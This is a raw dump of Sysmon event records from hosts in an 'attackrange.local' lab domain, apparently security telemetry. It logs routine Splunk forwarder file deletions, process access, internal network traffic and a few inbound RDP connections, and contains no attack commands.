09:07:39.245{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C3E98A97DF0F31B263ED72F7CE3E6B0B,SHA256=715156E8FA797135F8F27B66FFB9302693356F877D7746E7E65533F0D22A111B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:40.831{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A7DD1D8ADE258FE2474CFA835624F6,SHA256=7900EC429BE5FF3A099437D0C71352ACB7512653B4EF0975665C0B666DF2C815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:40.936{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B76E65138AD2D3CDB06A6B788F8AD3,SHA256=98C80068D3BF1924F22BFD24914B0609A7A540E7B2B92EBFD7604DA4B0E8FFDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:41.952{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=457569CB5340692531A6A26A14B1C03C,SHA256=07F9287B312872E11BCCAE30538F6400FDFC0BBAC0203416F6862392EB418C81,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:39.774{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53299-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:42.959{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97B83D14367414DE8336260DC431CB7A,SHA256=78BDDBCD81525EC750E072CC026240E59B8AAEB517FF5E7C0EE2740A157D357C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:42.064{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71FD74214FB8FA9CF4BED60A18A3246,SHA256=EABF1A29D22FB3110490E6E6EE607E4E923875B2025F116A8B9D2F8BECA4B478,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:42.724{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F95A9E5B89772C742E142D2B7D6B110A,SHA256=4AA22C8A424A18DD0561A9C4B24878EDCEC35E0F0957D5E0FE499DC4D32A91E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:39.862{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59332-false10.0.1.12-8000- 23542300x8000000000000000978012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:43.959{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED42BD854C5194BBFE28329EBFFAA90A,SHA256=E436024E6E99814D41829F03FFC3A8EE56DFA0714700AE104C65FC69D62F8DFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:40.064{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58245-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:43.129{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06616A065CF5E7AD61C1544F6EEB3CA7,SHA256=BCDF998796D051095439723F31FB86D89BC950938875F9CE63C29E04E3E1DCA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:44.959{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDD608B8BC1E754EEA8C91EF0A021B3,SHA256=DED6C36BEBB674AF3BA0702D2B582BEDDBA78B3C4E16BA3E443A2F0093CD6891,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.628{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89E0-6151-167A-00000000FC01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-89E0-6151-167A-00000000FC01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.612{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89E0-6151-167A-00000000FC01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.597{5EBD8912-89E0-6151-167A-00000000FC01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.162{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CFEDE3CC30D52F35BDA5E6D170AF4D6,SHA256=8F4764FE570B35BB8971D52053CE8A49C3D7A9B3D9E50DFF94DF334FE477A4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:45.974{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF812D6D940BD25EA7CD3DA45A4B31A5,SHA256=A020BE1B344ED01B5D0772B6C3E68C834DD9883A797A88546683B61E03DEA811,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.612{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5B18323E8E56BED048F2B1FDA55005F,SHA256=6D9DEFC1C71EE0368E6BEB1059E8283CD9B78470AD5A589E2DB330A33EF0DCE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.612{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=473524B30AFF788259ACA332D37C6CE6,SHA256=9173C2717DD0B4D4E838B8BDA464325776974B6C512A20B7BB2FECE59B7E0477,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.480{5EBD8912-89E1-6151-177A-00000000FC01}46485028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89E1-6151-177A-00000000FC01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89E1-6151-177A-00000000FC01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.312{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89E1-6151-177A-00000000FC01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.297{5EBD8912-89E1-6151-177A-00000000FC01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.228{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8023B7A0E7AD288AD85D106D80A4C8B1,SHA256=431F8A4CA0D07E4980421B60386CE7DEE9B367815DCDBD0AB776D781F69CA93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:45.881{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=149009061807A34E660EE1062FB79F34,SHA256=EFF5EA8584FA83409B3B207973B1A8A31E17524E024B5D3AF0DA8D5B0E2BF13B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:42.844{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com47657-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:46.990{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A20627C5018C62CB56E510A2EE2DDAE7,SHA256=F7DC97496D92D6C97DFDC06ECC73E312184D336BBCC3F821D856BBCB84352465,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:46.995{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 